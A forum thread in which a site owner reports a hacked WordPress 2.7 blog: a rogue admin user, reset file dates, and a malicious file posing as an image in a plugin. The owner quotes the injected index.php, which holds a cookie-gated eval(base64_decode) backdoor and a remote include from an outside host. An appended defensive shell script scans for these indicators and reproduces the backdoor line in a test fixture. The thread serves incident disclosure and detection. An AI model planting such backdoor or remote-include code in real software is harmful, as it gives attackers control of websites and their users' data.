Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • UPDATE:
    Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments.

    todo.cache was found in a plugin directory named “Get Recent Comments”.
    The “picture” file was found in the Uploads folder, where normal pictures reside…

    We are tightening security on the blogs and will update when complete.

    Hi,

    We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can’t log in to your blog and are sent into a loop (no error message either).

    Once we check the DB users table, we have a new user called WordPress, and then I assume there is some new content added to the blog, although we were not able to find it. Look for some comment spam and maybe new content.

    The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can’t tell which files were changed and we must assume everything is compromised.

    The attack includes the addition of these lines into index.php; xmlrpc.php was also changed. This is index.php:

    <?php if(md5($_COOKIE['c9a8b336f8ead0e0'])=="5dfa4a678793aeaee3d9394d72d12147"){ eval(base64_decode($_POST['file'])); exit; } ?><?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    if (isset($_GET['license'])) {
    	@include('https://wordpress.net.in/license.txt');
    } else {
    	require('./wp-blog-header.php');
    }
    ?>

    We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely.

    I am worried that there is a 2.7 vulnerability that is easily exploitable, if anyone has any ideas please let me know…

    THANKS
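Two checks a defender would run over a tree like the one described in the replies above, written here as an added example that is neither the poster's code nor WordPress's own: a fixed-string scan for the indicators visible in the quoted index.php, and a content comparison against a pristine copy of the same release, because the reset 2007 mtimes cannot be trusted. All paths, file contents and the cookie name in the fixture are constructed.

```shell
# Added example, not the poster's or WordPress's code: two checks a defender
# would run over a tree like the one described above. The indicator strings are
# the ones visible in the quoted index.php; every sample file is constructed.

# Fixed strings (grep -F) lifted from the injected lines in the thread.
wp_ioc_patterns() {
  printf '%s\n' \
    'eval(base64_decode($_POST' \
    'md5($_COOKIE[' \
    "@include('http" \
    'wordpress.net.in'
}

# Print "file:indicator" for every PHP file under $1 containing an indicator.
scan_wp_backdoors() {
  find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
    wp_ioc_patterns | while IFS= read -r pat; do
      if grep -qF -- "$pat" "$f"; then printf '%s:%s\n' "$f" "$pat"; fi
    done
  done
}

# The attack reset every mtime to 2007, so timestamps prove nothing; list files
# that differ from, or are absent in, a pristine copy of the same release instead.
changed_vs_pristine() {
  diff -rq "$2" "$1" | sort
}

# Constructed fixture: a pristine tree and a live tree whose index.php carries
# the same kind of injected prefix as the thread's sample, plus a non-PHP file
# standing in for the payload found in the plugin directory (not a real payload).
build_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/pristine" "$root/live/wp-content/plugins/get-recent-comments"
  printf '<?php require("./wp-blog-header.php"); ?>\n' > "$root/pristine/index.php"
  printf '<?php /* unchanged */ ?>\n' > "$root/pristine/wp-load.php"
  cp "$root/pristine/wp-load.php" "$root/live/wp-load.php"
  { printf '%s\n' '<?php if(md5($_COOKIE["k"])=="0"){ eval(base64_decode($_POST["file"])); exit; } ?>'
    cat "$root/pristine/index.php"; } > "$root/live/index.php"
  printf 'GIF89a (constructed stand-in, not a real payload)\n' \
    > "$root/live/wp-content/plugins/get-recent-comments/todo.cache"
  echo "$root"
}

root=$(build_fixture)
echo "== indicator hits =="; scan_wp_backdoors "$root/live"
echo "== differs from pristine =="; changed_vs_pristine "$root/live" "$root/pristine"
rm -rf "$root"
```

The pattern scan only looks at *.php, so the disguised file in the plugin directory surfaces only through the comparison against the pristine copy; on a real host, run both before deciding what to restore.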
